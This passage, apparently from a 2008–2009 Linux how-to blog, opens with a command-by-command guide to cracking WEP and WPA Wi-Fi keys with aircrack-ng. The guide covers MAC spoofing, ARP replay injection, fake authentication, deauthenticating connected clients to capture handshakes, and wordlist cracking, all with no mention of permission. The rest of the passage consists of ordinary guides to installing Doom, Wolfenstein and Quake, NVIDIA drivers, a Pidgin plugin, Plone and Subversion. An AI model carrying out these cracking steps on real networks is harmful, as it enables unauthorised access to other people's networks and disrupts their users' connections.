$ iwconfig

Change MAC of newly created interface
$ sudo ifconfig mon0 down
$ sudo macchanger -A mon0
$ sudo ifconfig mon0 up
$ ifconfig

From now on you'll be using mon0 interface.

Using airodump-ng
Find wireless network which is protected with:
$ sudo airodump-ng mon0

and write down target ssid (ESSID), MAC adress of access point (BSSID), channel number (CH), encryption type (ENC). When finished CTRL+C to exit.

Create directory for dumping information with:
$ cd ~/Documents
$ mkdir data
$ cd data

Run airodump-ng to capture packets from your access point to dumpfile*.cap. You should always specify a channel with airodump, because otherwise it will try to scan through all channels, and that will break your injection attack.
$ sudo airodump-ng --channel [Access Point channel] --bssid [Access Point bssid] -w [dumpfile] [device]

After a few seconds in airodump-ng, you should notice that there are clients connected to the access point. Connected clients will be listed under "STATION" at the lower half of the screen.
Take note of the MAC address of one of the clients - you will use it in the next step. This could be your faked MAC if there is no clients connected.

Using aireplay attack 3 - ARP Injection
Open another terminal window to run an ARP replay attack. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 then you should be getting #/s of 200 or higher, but more importantly, it should be much higher than what it was before.
$ aireplay-ng -3 -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]
-3 - is the number attack we're using. This attack keeps record of ARP packets which are used later on for decifering. There are 6 attacks numbered from 0 - 5.

Using aireplay attack 1 - Fake Authentication Attack
Usually attacks, 1 and 0, work together. There are situations when attack 1 will not work (i.e. MAC filtering is on), but it will work most of the time, and it's real quick. Currently, if you're following along, you should have two terminal windows open and running airodump and aireplay attack 3. If not, go back and follow the directions again.
To initiate attack 1 type:
$ aireplay-ng -1 0 -e [essid] -a [Access Point bssid] -h [yours faked client MAC addr] [device]

-1 - This is the number attack we're using. It is a fake authentication attack, making us authenticated with the AP so that we can deauthenticate, as you'll soon see.
0 - This is the delay between tries, if it doesn't happen on the first try, for a variety of reasons.

You must have fairly good power showing in airodump for this to work. It needs to be over 40 showing in the power column. Your experience may differ greatly. If all goes well, when you press Enter you should see something like:
10:13:24 Sending authentication request (Open System)
10:13:24 Authentication successful
10:13:24 Sending Association Request
10:13:24 Association successful :-)

What just happened is that you became associated with the AP, meaning that if you lose association, the AP will send out a call to get you back. This is what will usually start the ARP request. If you take a look at you console running attack 3, it possibly started getting lots of data in #Data and #/s columns. More often than not, you'll have to wait for the next step.

There can be many reasons that you won't be able to associate with the AP, meaning this attack failed. First of all, the AP may have MAC filtering on, which may be able to be circumvented. Or you may not be close enough to the AP to associate. It can also be that the encryption is WPA, not WEP, so you cannot use this method to inject.

Using aireplay attack 0 - Deauthentication Attack
If your #Data count is flying up, then you can skip this step. If not, or you are trying to crack WPA then read on.
If you followed up until now, you should a few windows open. One is running airodump, another is running aireplay attack 3. The last one ran aireplay attack 1 and you're back at the prompt now.

At the prompt type:
$ aireplay-ng -0 10 -e [essid] -a [Access Point bssid] [device]

-0 - is the attack number we're using. It is a deauthentication attack, meaning it tells the AP that we've disassociated and it tries to reconnect, sending out an ARP, which is what attack 3 is waiting for.
10 - is the amount of times it should send out the deauthentication. It may not reach the AP on the first try or what, so we like to do it a couple of times, hence the number 10.

This attack is best to use for WPA ecryption while waiting for HANDSHAKE to appear in upper right part of dumping screen.

If all went well then attack 3 should have picked up an ARP request, and it should be injecting very, very quickly. Go to the window with airodump, and watch with delight as the #Data count flies up.

Using aireplay attack 2 - Interactive Packet Replay
If your #Data count is not flying up, try this attack in which we are looking for large packet to use:
$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]

When ask to use this packet say yes:
Use this packet: y

Final step - aircrack
For WEP encryption wait a few minutes until the #Data reaches 50 000. This should be enough, but we leave the attack running just in case. Just remember that if you are cracking WEP encryption you are waiting for more data and if you are cracking WPA encryption you are waiting for HANDSHAKE to appear in upper right part of dumping screen when some client is connecting on access point. So for WEP you should use aireplay attacks 3, 1 and 0 in that order and for WPA you should use aireplay attacks 3 and 0.

After collected enough data or got a handshake you can disconnect and go to another location with data. Open another terminal window and run aircrack-ng to initiate key searching:
$ sudo aircrack-ng -r masterdb wpa*.cap -w '/path/to/password.lst'

After some time you will have the key.

Resources
http://www.aircrack-ng.org/doku.php?id=tutorial
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

Tuesday, March 10, 2009

Doom on Linux

Doom 1 and 2

Prerequisites:
* SDL-32bit
* SDL_mixer-32bit

Download Doom legacy engine from:
$ wget http://prdownloads.sourceforge.net/doomlegacy/legacy_142_win32.zip

Copy *.wad files (doom.wad, doom2.wad, etc.) to extracted directory.

Start game with:
$ ./lsdldoom -opengl -IWAD doom.wad

where doom.wad is the name of *.wad file which you want to start.

Doom3 and RoE

Download doom3 installer from
$ wget ftp://ftp.idsoftware.com/idstuff/doom3/linux/

Create directory structure with:
$ mkdir -p /usr/local/games/doom3/base
$ mkdir -p /usr/local/games/doom3/d3xp

Now copy installer to doom3 directory with:
$ sudo cp doom3-linux-1.3.1.1304.x86.run /usr/local/games/doom3/

Start installer and install doom3
$ cd /usr/local/doom3
$ sudo sh doom3-linux-1.3.1.1304.x86.run

Start game with:
$ ./doom3 +set s_driver oss
$ ./doom3 +set s_driver oss +set fs_game d3xp

Create symbolic links with:
$ sudo ln -s /media/doom3/base/pak000.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak001.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak002.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak003.pk4 /usr/local/games/doom3/base
$ sudo ln -s /media/doom3/base/pak004.pk4 /usr/local/games/doom3/base

$ sudo ln -s /media/doom3/d3xp/pak000.pk4 /usr/local/games/doom3/d3xp

Resource:
http://zerowing.idsoftware.com/linux/doom/

Sunday, March 8, 2009

Wolfenstein on Linux

Wolfenstein 3D

Well, this is the first FPS I played on PC 386, more then 15 years back at 1993. This was extraordinary experience. Although new games are much more real and gives you better atmosphere and reality, I can't forget this little fellow. So I tried to revive him after 15 years on my linux machine.

You'll need to download source code for wolf engine:
$ wget http://www.stud.uni-karlsruhe.de/~uvaue/chaos/bins/Wolf4SDL-1.6-src.zip

Additional System Requirements:
* Original game data files
* libSDL
* libSDL_Mixer

Using YaST or any other package manager install SDL-devel and SDL_mixer-devel package.
Extract downloaded source code and copy original game files *.wl6 to extracted directory. Don't forget to put original game file names to lowercase.
$ cd /path/to/extracted/source/Wolf4SDL-1.6-src
make

If you can't find original game files, then download shareware 1.4 version from:
$ wget http://www.users.globalnet.co.uk/~brlowe/wolf3d14.zip

and copy *.wl1 files instead. Again, rename file names to lowercase representation. If you are using shareware game files you will also need to change version.h file before compiling. Define CARMACIZED and UPLOAD and comment others. It is well documented and editing won't be problem.

After compiling, start game by starting wolf3d executable:
$ ./wolf3d

Reference:
http://www.happypenguin.org/show?Wolf4SDL


Return to Castle Wolfenstein

Additional System Requirements:
* Original game data files
* libstdc++-libc6.2-2.so which you can get by installing compat package using YaST or using zypper
$ zypper in compat

Create directory structure with:
$ mkdir -p /usr/local/games/wolfenstein/main

Download installer from:
$ wget ftp://ftp.idsoftware.com/idstuff/wolf/linux/wolf-linux-1.41b.x86.run

Copy installer to main directory with:
$ sudo cp wolf-linux-1.41b.x86.run /usr/local/games/wolfenstein

Run installer with:
$ sudo sh wolf-linux-1.41b.x86.run

Copy or create links for game data files:
$ sudo ln -s /media/Wolfenstein/Main/mp_pak0.pk3 /usr/local/games/wolfenstein/main
$ sudo ln -s /media/Wolfenstein/Main/pak0.pk3 /usr/local/games/wolfenstein/main
$ sudo ln -s /media/Wolfenstein/Main/sp_pak1.pk3 /usr/local/games/wolfenstein/main

Start single player with:
$ sudo bash -c 'echo "wolfsp.x86 0 0 direct" > /proc/asound/card0/pcm0p/oss'
$ sudo bash -c 'echo "wolfsp.x86 0 0 disable" > /proc/asound/card0/pcm0c/oss'
$ ./wolfsp

Start multiplayer with:
$ sudo bash -c 'echo "wolf.x86 0 0 direct" > /proc/asound/card0/pcm0p/oss'
$ sudo bash -c 'echo "wolf.x86 0 0 disable" > /proc/asound/card0/pcm0c/oss'
$ ./wolf

Resource:
http://zerowing.idsoftware.com/linux/wolf/
http://www.happypenguin.org/show?Return%20To%20Castle%20Wolfenstein

Tuesday, March 3, 2009

Kernel upgrade removes NVIDIA module

Using YOU (YaST Online Update) on openSUSE, I upgraded to new kernel version and after restarting system, NVIDIA module cannot be found. I was back to runlevel 3.
To go back to runlevel 5 you have to edit your /etc/X11/xorg.conf and comment the line with # like this:
# driver "nvidia"

or change "nvidia" to "nv" so it looks like this
driver "nv"

Restart your system or try to start X server using:
$ startx

After you reached init 5, go to YaST and serach installed packages with NVIDIA search key. Remove that installed packages to remove old uncompatibile drivers.

From NVIDIA download page, download latest driver that fits your system:
http://www.nvidia.com/object/unix.html

If you are not sure wich driver is right for you, try using this link:
http://www.nvidia.com/Download/index.aspx

Prerequisites
* compiler gcc,
* program make and
* package kernel-source

If you don't have them installed you can do it using YaST.

Go to runlevel 3 by typing the following comand as root in one of the consoles (which you can access by pressing ctrl-alt-f1)
$ init 3

Now go to the directory containing the drivers.
$ cd /the/path/where/you/saved/the/drivers/from/nvidia/website

Now simply type the following and follow instructions
$ sh NVIDIA-Linux-x86_64-180.29-pkg2.run -q

Installer will try to compile nvidia module for your new version of kernel.

The next step is to configure the X.org to use the new nvidia drivers. To do this, type the following
$ sax2 -r -m 0=nvidia

To go back to runlevel 5 type:
$ init 5

After each kernel update you need to run
$ sh NVIDIA-Linux-x86_64-180.29-pkg2.run -K

Friday, January 30, 2009

Quakes on Linux

Quake I

Make your destination directory:
$ sudo mkdir -p /usr/local/games/quake/id1

Download latest stable official release of darkplaces engine and mod from:
http://icculus.org/twilight/darkplaces/download.html

Engine is enough but if you want some improved lighting effects then you'll need mod too.
$ wget http://icculus.org/twilight/darkplaces/files/darkplacesengine20090128.zip
$ wget http://icculus.org/twilight/darkplaces/files/darkplacesmod20080808.zip

After extracting to ~/Quake directory copy one of darkplaces executabile files which suits your system:
$ sudo cp ~/Quake/darkplacesengine20081004/darkplaces-linux-x86_64-sdl /usr/local/games/quake

Now copy files from original windows Quake CD or destination directory of windows installation:
$ sudo cp -rv /media/Quake/ID1/* /usr/local/games/quake/id1/ > ~/Desktop/files.txt
After coping make shure all files specified in files.txt are in small case.

Make your launch script with:
$ joe ~/Desktop/quake

Add this content:
$ cd /usr/local/games/quake
./darkplaces-linux-x86_64-sdl

Save and make this file executable:
$ sudo chmod 775 quake

Any mission packs or downloaded mods needs just to be extracted in destination directory /usr/local/games/quake/. Activate installed mods with "Browse mod" menu option inside game.

Quake II

Make your destination directory:
$ sudo mkdir -p /usr/local/games/quake2/baseq2

Download binary RPM engine from http://www.chez.com/colinf/rpms/quake2/ :
$ wget http://www.chez.com/colinf/rpms/quake2/quake2-r0.16.1-io1.i386.rpm
$ sudo rpm -Uvh quake2-r0.16.1-io1.i386.rpm


From original QuakeII windows CD or destination directory of windows installation copy content of baseq2 folder to /usr/local/games/quake2/baseq2 :
$ sudo cp -rv /media/win/games/quake2/baseq2/* /usr/local/games/quake2/baseq2
Make sure all copied files are in small case.

To start game execute:
$ /usr/local/games/quake2/quake2.sh

For any mission packs you just need to extract pkg files in destination directory for example /usr/local/games/quake2/rogue.
After extracting start quake2 with set game 'value' parameter:
$ ./sdlquake2 +set basedir /usr/local/games/quake2 +set game rogue

Quake III

Make your destination directory:
$ sudo mkdir -p /usr/local/games/quake3/baseq3

From original QuakeIII windows CD or destination directory of windows installation copy pak0.pk3 from content of baseq3 folder to /usr/local/games/quake3/baseq3 :

$ sudo cp /media/win/games/quake3/baseq3/pak0.pk3 /usr/local/games/quake3/baseq3


Download Quake3 installer:
$ wget ftp://ftp.idsoftware.com/idstuff/quake3/linux/linuxq3apoint-1.32b-3.x86.run

Move it to destination directory:
$ mv ~/Desktop/linuxq3apoint-1.32b-3.x86.run /usr/local/games/quake3

Start installation and follow instructions on your screen (you can answer “Yes” to every question you are asked during the installation)
$ cd /usr/local/games/quake3
$ linux32 sh /usr/local/games/quake3/linuxq3apoint-1.32b-3.x86.run

Download patch:
$ wget ftp://ftp.idsoftware.com/idstuff/quake3/quake3-1.32c.zip

After extracting copy content of linux directory over files in quake3 destination path
$ sudo cp ~/Desktop/linux/* /usr/local/games/quake3

To start game execute:
$ /usr/local/games/quake3/quake3

If you experience problems with sound use:
$ sudo bash -c 'echo "quake3.x86 0 0 direct" > /proc/asound/card0/pcm0p/oss'
$ sudo bash -c 'echo "quake3.x86 0 0 disable" > /proc/asound/card0/pcm0c/oss'

If you experience hangs during play start quake3 with:
$ ./quake3.x86 +set s_musicvolume -1

Quake 4

Download installer with:
$ cd ~/Desktop
$ wget ftp://ftp.idsoftware.com/idstuff/quake4/linux/quake4-linux-1.4.2.x86.run
Make your destination directory:
$ mkdir -p /usr/local/games/quake4/q4base

Quake4 has is very big in size so you may want to create links instead of coping:
$ sudo ln -s /media/win/games/quake4/Setup/Data/q4base/*.pk4 /usr/local/games/quake4/q4base
$ sudo chmod -Rv 775 q4base/*.pk4

Move installer to your destination directory and execute:
$ cd /usr/local/games/quake4
$ sudo mv ~/Desktop/quake4-linux-1.4.2.x86.run .
$ sudo sh quake4-linux-1.4.2.x86.run

Start quake with:
$ ./quake4 +set s_driver oss

Monday, January 12, 2009

Install msn-pecan protocol plugin to Pidgin

If you have problems with connecting to MSN account with Pidgin and receive error like
Unable to retrieve MSN Address Book

then msn-pecam protocol helps.

Make sure you have following packages installed
libpurple-devel
autoconf
automake
gcc
gcc-c++
make

You can download it by typing:
$ sudo zypper install libpurple-devel autoconf automake gcc gcc-c++ make

To download latest version of msn-pecam protocol plugin for Pidgin check this link:
http://code.google.com/p/msn-pecan/downloads/list

Download latest source tar.bz2 package. In my case:
$ wget http://msn-pecan.googlecode.com/files/msn-pecan-0.0.17.tar.bz2

$ tar -xvjf msn-pecan-0.0.17.tar.bz2
$ cd msn-pecan-0.0.17
$ make
$ sudo make install

This will install libmsn-pecan.so module in this path /usr/lib/purple-2/libmsn-pecan.so
Try restarting Pidgin and find WLM protocol module. If it's not there then probably problem is wrong installation path.

Find your module installation path using:
$ pidgin --debug

If you're using 64bit OS version then you need to install it to /usr/lib64/purple-2
So just do the folowing:
$ sudo mv /usr/lib/purple-2/libmsn-pecan.so /usr/lib64/purple-2
$ sudo rmdir /usr/lib/purple-2

Restart Pidgin. Change protocol from MSN to WLM. And it works fine.
Cheers!

Monday, December 29, 2008

Plone deployment using buildout

Prerequisites
* python2.4
* python-devel
* python-imaging - Python Imaging Library
* python-setuptools - setuptools

Under Ubuntu use:
$ sudo apt-get install python2.4 build-essential python2.4-dev python-imaging python-setuptools

Under openSUSE use:
$ sudo zypper in python-2.4 python-2.4-devel python-2.4-imaging python-2.4-xml

If you're using Linux and your distribution doesn't provide a package for setuptools, download ez_setup.py and run it with:
$ python2.4 ez_setup.py

Note: I got error here saying that directory structure doesn't exists. In that case just create it with mkdir command and try again:
mkdir -p /usr/local/lib64/python2.4/site-packages

This will download and install setuptools and the easy_install script. Watch the console output to understand where easy_install is installed. If this is not in your system PATH, you should add this directory to the path as well by adding following to lines to the end of $HOME/.bash_profile for one user, /etc/profile for all users except root, and /root/.bash_profile for root user.
PATH=$PATH:/path/to/easy_install
export PATH

Installation
$ sudo easy_install-2.4 -U ZopeSkel
$ cd /home/'your_username'
$ paster create --list-templates
$ paster create -t plone3_buildout myPloneProject
-----------------------------------------------------------------------------------
Enter zope2_install (Path to Zope 2 installation; leave blank to fetch one) ['']:
Enter plone_products_install (Path to directory containing Plone products; leave blank to fetch one) ['']:
Enter zope_user (Zope root admin user) ['admin']:
Enter zope_password (Zope root admin password) ['']: passwd
Enter http_port (HTTP port) [8080]:
Enter debug_mode (Should debug mode be "on" or "off"?) ['off']: on
Enter verbose_security (Should verbose security be "on" or "off"?) ['off']: on
-----------------------------------------------------------------------------------

Enter directory with created template:
$ cd myPloneProject

Create base directory structure, including scripts and latest version of the zc.buildout egg, for created template:
$ python2.4 bootstrap.py

Next step is time-consuming so after typing next command go for coffee. If you have some download running in background, stop it before doing online build with:
$ ./bin/buildout -v

This reads the generated buildout.cfg file and executes its various "parts", setting up Zope, creating a Zope instance, downloading and installing Plone.

You will need to run ./bin/buildout again each time you change buildout.cfg. If you do not want buildout to go online and look for updated versions of eggs or download other archives, you can run it in non-updating, offline mode, with using -o switch:
$ ./bin/buildout -o

Start your Zope instance in foreground so you can see debug info in console:
$ ./bin/instance fg

Start your Zope instance as background process in daemon mode:
$ ./bin/instance start

To run test use:
$ ./bin/instance test -s plone.portlets

Stop your instance with:
$ ./bin/instance stop

Resource:
http://plone.org/documentation/tutorial/buildout/tutorial-all-pages

Wednesday, December 17, 2008

Subversion with apache on Centos

I used Centos4 as OS on which I installed subversion with apache. It was painful three days but it was sucess at the end. Before we start with this I have to say couple of important things:
subversion 1.4.x will work with apache-2.0.x cause they relay on APR 0.9.x module, and
subversion-1.5.x will work with apache-2.2.x cause they relay on APR 1.3.x module.
APR 0.9.x and APR 1.3.x are not compatibile, and because of that, subversion 1.5.x will not work with apache-2.0.x. Same case is probably with subversion 1.4.x and apache-2.2.x combination. When installing subversion modules for apache from source you'll need to tell to configuration where are APR and APR-UTIL libraries. You can use these libraries from apache source or from subversion. I decided to use APR and APR-UTIL libraries from apache source.

Subversion uses a lot of other programs and libraries which need to be installed before using the subversion package. So to simplify things I'll try using yum as much as possible.

Update your version of apache and install subversion that fits this version of apache using yum:
yum upgrade httpd

Add repos to yum:
joe /etc/yum.repos.d/dag.repo

[dag]
Name=Dag RPM Repository for Red Hat Enterprise Linux
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag
gpgkey=http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt
gpgcheck=1
enabled=1

Then install these packages:
yum install httpd-devel
yum install subversion

Check the version of your installed apache (2.0.52 in my case) using:
yum info httpd

and download apropriate source using:
wget http://apache.blic.net/httpd/httpd-2.0.63.tar.gz

There is no source for 2.0.52 any more so I used 2.0.63 with crossed fingers.
tar xfz httpd-2.0.63.tar.gz
cd httpd-2.0.63

cd apr
./configure --prefix=/usr/local/apr
make
make install
cd ..

cd apr-util
./configure --prefix=/usr/local/apr-utils --with-apr=/usr/local/apr/
make
make install
cd ..

Check the version of your installed subversion (1.4.6 in my case) using:
yum info subversion

and download apropriate source using:
wget http://subversion.tigris.org/downloads/subversion-deps-1.4.6.tar.gz
wget http://subversion.tigris.org/downloads/subversion-1.4.6.tar.gz

tar xfz subversion-1.4.6.tar.gz
tar xfz subversion-deps-1.4.6.tar.gz
cd subversion-1.4.6

rm -f /usr/local/lib/libsvn*
rm -f /usr/local/lib/libapr*
rm -f /usr/local/lib/libexpat*
rm -f /usr/local/lib/libneon*
sh ./autogen.sh

./configure --with-apxs=/usr/sbin/apxs \
--with-apr=/usr/local/apr/ \
--with-apr-util=/usr/local/apr-utils/
make
make install

At this point you will have included two svn modules in httpd.conf file which is why we did compiling from source.

Make your project for first revision of repository
mkdir -v /usr/local/svn-projects
mkdir -v /usr/local/svn-projects/htdocs
joe /usr/local/svn-projects/htdocs/index.html
chown -Rv apache.apache /usr/local/svn-projects

Make your repository
mkdir -v /usr/local/subversion/
/usr/local/bin/svnadmin create --fs-type fsfs /usr/local/subversion/repository
chown -Rv apache.apache /usr/local/subversion
ls /usr/local/subversion/repository

Edit httpd.conf.
Check that there are two loaded svn modules.
LoadModule dav_svn_module /usr/lib/httpd/modules/mod_dav_svn.so
LoadModule authz_svn_module /usr/lib/httpd/modules/mod_authz_svn.so

Add this code to apache httpd.conf:
< Location /subversion>
DAV svn
SVNPath /usr/local/subversion/repository/
AuthType Basic
AuthName "Subversion repository"
AuthUserFile /usr/local/subversion/repository/conf/svn-auth-file
Require valid-user
</Location>

Add new users. For first user:
htpasswd -cmd /usr/local/subversion/repository/conf/svn-auth-file {user-name}

For every other user:
htpasswd -md /usr/local/subversion/repository/conf/svn-auth-file {user-name}

Prepare files for repository and import your project to repository:
mkdir -pv /tmp/subversion-layout/{branches,tags}
mv -v /usr/local/svn-projects/htdocs /tmp/subversion-layout/trunk
export SVN_EDITOR=joe
/usr/local/bin/svn import /tmp/subversion-layout/ http://127.0.0.1/subversion/

Make your working copy:
cd /usr/local/svn-projects/
/usr/local/bin/svn checkout http://127.0.0.1/subversion/trunk/ htdocs

Make post-commit hook to get fresh working copy:
cp -v /usr/local/subversion/repository/hooks/post-commit.tmpl /usr/local/subversion/repository/hooks/post-commit
chmod +x /usr/local/subversion/repository/hooks/post-commit

Edit post-commit hook by commenting two last lines and by adding one line like this:
#commit-email.pl "$REPOS" "$REV" commit-watchers@example.org
#log-commit.py --repository "$REPOS" --revision "$REV"
/usr/bin/svn update /usr/local/svn-projects/htdocs/ --username svn_user --password svn_pass --non-interactive >> /usr/local/subversion/repository/logs/post-commit.log

Make log file for created hook:
mkdir -v /usr/local/subversion/repository/logs/
touch /usr/local/subversion/repository/logs/post-commit.log
chown -Rv apache.apache /usr/local/subversion/ /usr/local/svn-projects/

Restart your apache and you'll have your first revision working:
/bin/sbin/httpd -k restart

Cheers!